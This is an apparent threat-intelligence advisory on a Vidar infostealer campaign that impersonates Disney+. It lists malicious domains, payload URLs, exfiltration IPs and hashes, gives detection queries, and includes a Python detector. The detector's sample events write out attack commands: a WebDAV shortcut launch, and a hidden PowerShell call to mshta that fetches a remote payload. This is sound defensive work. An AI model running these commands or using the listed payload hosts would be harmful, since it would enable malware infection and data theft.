Date: 07/25/2025
Severity: Critical
Summary
Our team uncovered a malicious website impersonating Disney+ that delivers the Vidar infostealer. The site posed as an influencer collaboration portal and lured visitors into opening Windows shortcut (.lnk) files hosted on an attacker-controlled WebDAV server. Clicking the "View Full Brief" button triggered a multi-stage infection chain involving Windows shortcuts, PowerShell, MSHTA, VBS, and obfuscated JavaScript; a decoy PDF was displayed while the malware executed silently in the background. Stolen data was exfiltrated over HTTPS POST requests to the IP addresses listed below. This campaign dates back to at least July 5, 2025. While many of the URLs are now inactive, the domain disneyplus[.]business remains live and may be reused in future attacks. Note that several of the indicators live on legitimate platforms (Telegram channels, Steam profiles) and third-party websites; detections for those should match on the full URL rather than on the hosting domain.
Indicators of Compromise (IOC) List
Domains\URLs :
disneyplus.business
https://disneyplus.business/influencersbrief/?id=special
https://disneyplus.business/influencersbrief/?id=youtube
http://89.23.113.207/Documents/Brief_Disney.lnk
http://89.23.113.207/Documents/BriefDisney.lnk
http://89.23.113.207/Documents/BriefDisneyFull.lnk
http://89.23.113.207/Documents/Disney_Full_Brief.lnk
http://89.23.113.207/Documents/DisneyBrief.lnk
https://investtrad.com/Blue.mp4
https://www.frontier.net.pk/Brief_Disney.mp4
https://www.localmais.com.br/Disney_Full_Brief.mp4
https://squeakiekids.com/Brief_Disney.pdf
https://www.localmais.com.br/disney.pdf
https://dansorium.gr/DarkCyanfa1d3_Install.exe
https://www.localmais.com.br/PlacedExotic.exe
https://t.me/l07tp
https://t.me/gt77cra
https://steamcommunity.com/profiles/76561199869630181
https://steamcommunity.com/profiles/76561199874410755
https://116.202.184.145/ (HTTPS POST requests for data exfiltration)
https://116.203.165.124/ (HTTPS POST requests for data exfiltration)
IP Address :
89.23.107.148
89.23.113.207
116.202.184.145 (HTTPS POST data exfiltration endpoint)
116.203.165.124 (HTTPS POST data exfiltration endpoint)
Hash (SHA-256) :
ad4931dedfb3060207f80e3e18df3fbef07a81dbe20dab667f5f14d2ac17136a
4f8a50a9365d639c8384ec857c618a4f768b1ec6b677f5e79bd5d0eaaa579bcb
51cc8732ad424885e37b8d20f99faed9336e78a8a18590d61c64498eb4ec136e
4d6ba4c3e0112fa8ad04153999086eecbe9ba33656a52c627a940650d086e877
94d0a4eced73f3fabc66e650218274b35737bce94f6630b273487b1f3b13841e
0ce235a306f30edff98fcbe045e7566c8e537fef7f5d094800927e2b1d5edc65
46a24124fa27c54512dd02bee6432d4f063d16224926eff268b5625ee258e174
65325bda1aa8c53cde9f59733462154d702d440daead034c5130a78adef31aee
660da1824c143de666903c2b3983df605a3494a9ddaa7b65919e1263b095e343
e7fda5d2d6cc8971565ab7df08b6fe9417c307f692e0a2ef45f758f8092350ad
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Domains\URLs 1 :
domainname like "https://www.localmais.com.br/disney.pdf" or url like "https://www.localmais.com.br/disney.pdf" or siteurl like "https://www.localmais.com.br/disney.pdf" or domainname like "http://89.23.113.207/Documents/Brief_Disney.lnk" or url like "http://89.23.113.207/Documents/Brief_Disney.lnk" or siteurl like "http://89.23.113.207/Documents/Brief_Disney.lnk" or domainname like "https://t.me/gt77cra" or url like "https://t.me/gt77cra" or siteurl like "https://t.me/gt77cra" or domainname like "https://investtrad.com/Blue.mp4" or url like "https://investtrad.com/Blue.mp4" or siteurl like "https://investtrad.com/Blue.mp4" or domainname like "https://steamcommunity.com/profiles/76561199874410755" or url like "https://steamcommunity.com/profiles/76561199874410755" or siteurl like "https://steamcommunity.com/profiles/76561199874410755" or domainname like "https://t.me/l07tp" or url like "https://t.me/l07tp" or siteurl like "https://t.me/l07tp" or domainname like "http://89.23.113.207/Documents/Disney_Full_Brief.lnk" or url like "http://89.23.113.207/Documents/Disney_Full_Brief.lnk" or siteurl like "http://89.23.113.207/Documents/Disney_Full_Brief.lnk" or domainname like "disneyplus.business" or url like "disneyplus.business" or siteurl like "disneyplus.business" or domainname like "https://disneyplus.business/influencersbrief/?id=special" or url like "https://disneyplus.business/influencersbrief/?id=special" or siteurl like "https://disneyplus.business/influencersbrief/?id=special" or domainname like "https://disneyplus.business/influencersbrief/?id=youtube" or url like "https://disneyplus.business/influencersbrief/?id=youtube" or siteurl like "https://disneyplus.business/influencersbrief/?id=youtube" or domainname like "http://89.23.113.207/Documents/BriefDisney.lnk" or url like "http://89.23.113.207/Documents/BriefDisney.lnk" or siteurl like "http://89.23.113.207/Documents/BriefDisney.lnk" or domainname like "http://89.23.113.207/Documents/BriefDisneyFull.lnk" or url like "http://89.23.113.207/Documents/BriefDisneyFull.lnk" or siteurl like "http://89.23.113.207/Documents/BriefDisneyFull.lnk"
Domains\URLs 2 :
domainname like "http://89.23.113.207/Documents/DisneyBrief.lnk" or url like "http://89.23.113.207/Documents/DisneyBrief.lnk" or siteurl like "http://89.23.113.207/Documents/DisneyBrief.lnk" or domainname like "https://www.frontier.net.pk/Brief_Disney.mp4" or url like "https://www.frontier.net.pk/Brief_Disney.mp4" or siteurl like "https://www.frontier.net.pk/Brief_Disney.mp4" or domainname like "https://www.localmais.com.br/Disney_Full_Brief.mp4" or url like "https://www.localmais.com.br/Disney_Full_Brief.mp4" or siteurl like "https://www.localmais.com.br/Disney_Full_Brief.mp4" or domainname like "https://squeakiekids.com/Brief_Disney.pdf" or url like "https://squeakiekids.com/Brief_Disney.pdf" or siteurl like "https://squeakiekids.com/Brief_Disney.pdf" or domainname like "https://dansorium.gr/DarkCyanfa1d3_Install.exe" or url like "https://dansorium.gr/DarkCyanfa1d3_Install.exe" or siteurl like "https://dansorium.gr/DarkCyanfa1d3_Install.exe" or domainname like "https://www.localmais.com.br/PlacedExotic.exe" or url like "https://www.localmais.com.br/PlacedExotic.exe" or siteurl like "https://www.localmais.com.br/PlacedExotic.exe" or domainname like "https://steamcommunity.com/profiles/76561199869630181" or url like "https://steamcommunity.com/profiles/76561199869630181" or siteurl like "https://steamcommunity.com/profiles/76561199869630181" or domainname like "https://116.202.184.145/" or url like "https://116.202.184.145/" or siteurl like "https://116.202.184.145/" or domainname like "https://116.203.165.124/" or url like "https://116.203.165.124/" or siteurl like "https://116.203.165.124/"
(The two IP-based entries are the HTTPS POST exfiltration endpoints; the original literal included the annotation text inside the quoted string, which would never match a real URL.)
IP Address :
dstipaddress IN ("89.23.107.148","89.23.113.207","116.202.184.145","116.203.165.124") or srcipaddress IN ("89.23.107.148","89.23.113.207","116.202.184.145","116.203.165.124")
Hash :
sha256hash IN ("4f8a50a9365d639c8384ec857c618a4f768b1ec6b677f5e79bd5d0eaaa579bcb","ad4931dedfb3060207f80e3e18df3fbef07a81dbe20dab667f5f14d2ac17136a","660da1824c143de666903c2b3983df605a3494a9ddaa7b65919e1263b095e343","46a24124fa27c54512dd02bee6432d4f063d16224926eff268b5625ee258e174","0ce235a306f30edff98fcbe045e7566c8e537fef7f5d094800927e2b1d5edc65","51cc8732ad424885e37b8d20f99faed9336e78a8a18590d61c64498eb4ec136e","65325bda1aa8c53cde9f59733462154d702d440daead034c5130a78adef31aee","4d6ba4c3e0112fa8ad04153999086eecbe9ba33656a52c627a940650d086e877","94d0a4eced73f3fabc66e650218274b35737bce94f6630b273487b1f3b13841e","e7fda5d2d6cc8971565ab7df08b6fe9417c307f692e0a2ef45f758f8092350ad")
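The queries above are written in Gurucul TDIR syntax and only run inside that platform. As an added example (not part of this advisory and not Gurucul's code), the following Python script applies the same indicators to constructed proxy-log lines and Sysmon-style process-creation events, with two refinements a practitioner would want: indicators hosted on shared platforms (Telegram, Steam, third-party sites) are matched on host plus path rather than on the domain, and the PowerShell to MSHTA to script-host chain and WebDAV UNC access described in the summary are flagged behaviourally rather than by URL alone. The log format, the event field names, and the sample `.vbs` and `.ps1` paths are assumptions for the demonstration; the IOC values themselves come from the list above.

```python
"""Added example (not part of the advisory, not Gurucul TDIR syntax): match proxy
logs and process events against the campaign IOCs above.  IOC values come from
the advisory's list; the sample log lines and events below are constructed."""
import re
from urllib.parse import urlparse

# Hosts that are attacker-controlled outright: any request to them is a hit.
IOC_HOSTS = {
    "disneyplus.business",
    "89.23.113.207",    # WebDAV server hosting the .lnk files
    "89.23.107.148",
    "116.202.184.145",  # HTTPS POST data exfiltration
    "116.203.165.124",  # HTTPS POST data exfiltration
}
# Attacker content on legitimate or shared hosts (Telegram, Steam, third-party
# sites): matched on host + path so the hosting domains are not blocked wholesale.
IOC_URLS = {u.lower() for u in (
    "investtrad.com/Blue.mp4",
    "www.frontier.net.pk/Brief_Disney.mp4",
    "www.localmais.com.br/Disney_Full_Brief.mp4",
    "squeakiekids.com/Brief_Disney.pdf",
    "www.localmais.com.br/disney.pdf",
    "dansorium.gr/DarkCyanfa1d3_Install.exe",
    "www.localmais.com.br/PlacedExotic.exe",
    "t.me/l07tp",
    "t.me/gt77cra",
    "steamcommunity.com/profiles/76561199869630181",
    "steamcommunity.com/profiles/76561199874410755",
)}
URL_RE = re.compile(r"https?://[^\s\"']+")
UNC_RE = re.compile(r"\\\\([\w.\-]+)(?:@\d+)?\\")  # \\host\ or \\host@port\ (WebDAV)
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parent -> child pairs that reproduce the PowerShell -> MSHTA -> VBS stages.
CHAIN = {("powershell.exe", "mshta.exe"), ("mshta.exe", "wscript.exe"), ("mshta.exe", "cscript.exe")}

def refang(text):
    """Undo common defanging so IOCs pasted from reports still match."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def match_url(url):
    """('host', h) or ('url', host+path) when the URL hits an IOC, else None."""
    u = refang(url.strip())
    parsed = urlparse(u if "://" in u else "http://" + u)
    host = (parsed.hostname or "").lower()
    if host in IOC_HOSTS:
        return ("host", host)
    hostpath = (host + parsed.path).lower()
    return ("url", hostpath) if hostpath in IOC_URLS else None

def check_process(event):
    """Sysmon event-1-style dict (Image, ParentImage, CommandLine) -> list of findings."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = refang(event.get("CommandLine", ""))
    reasons = []
    if (parent, image) in CHAIN:
        reasons.append(f"process chain {parent} -> {image}")
    if image in LOLBINS:
        for url in URL_RE.findall(cmd):
            if (hit := match_url(url)):
                reasons.append(f"{image} references IOC {hit[1]}")
        for host in UNC_RE.findall(cmd):
            if host.lower() in IOC_HOSTS:
                reasons.append(f"{image} opens WebDAV/UNC path on {host}")
    return reasons

def scan_proxy(lines):
    """(timestamp, url, hit) for every proxy log line that touches an IOC."""
    return [(line.split()[0], url, match_url(url))
            for line in lines for url in URL_RE.findall(line) if match_url(url)]

def scan_processes(events):
    """(index, findings) for every process event with at least one finding."""
    return [(i, r) for i, e in enumerate(events) if (r := check_process(e))]

# Constructed sample telemetry, not real logs.
SAMPLE_PROXY = [
    "2025-07-25T10:01:02Z 10.0.0.5 GET https://disneyplus.business/influencersbrief/?id=special 200",
    "2025-07-25T10:01:09Z 10.0.0.5 GET http://89.23.113.207/Documents/Brief_Disney.lnk 200",
    "2025-07-25T10:01:30Z 10.0.0.5 GET https://steamcommunity.com/profiles/76561199869630181 200",
    "2025-07-25T10:02:00Z 10.0.0.6 GET https://steamcommunity.com/app/730 200",
    "2025-07-25T10:03:11Z 10.0.0.5 POST https://116.202.184.145/ 200",
]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESSES = [  # constructed; script paths are placeholders, not campaign artifacts
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c start \\89.23.113.207@80\Documents\Brief_Disney.lnk"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -c "mshta https://investtrad.com/Blue.mp4"'},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://investtrad.com/Blue.mp4"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\Public\script.vbs"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]
```

Run against the constructed samples, `scan_proxy` reports the four requests that touch indicators and stays silent on the benign Steam page, and `scan_processes` flags the first four events (the WebDAV shortcut launch, the PowerShell and MSHTA stages referencing the staged payload URL, and the MSHTA to wscript hand-off) while ignoring the ordinary scheduled script. The `like` comparisons in the TDIR queries are exact-string matches on full URLs; the host-plus-path normalisation here is what lets the `?id=special` and `?id=youtube` variants, defanged copies, and case differences still match.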
Reference:
https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-07-24-IOCs-for-Vidar-activity.txt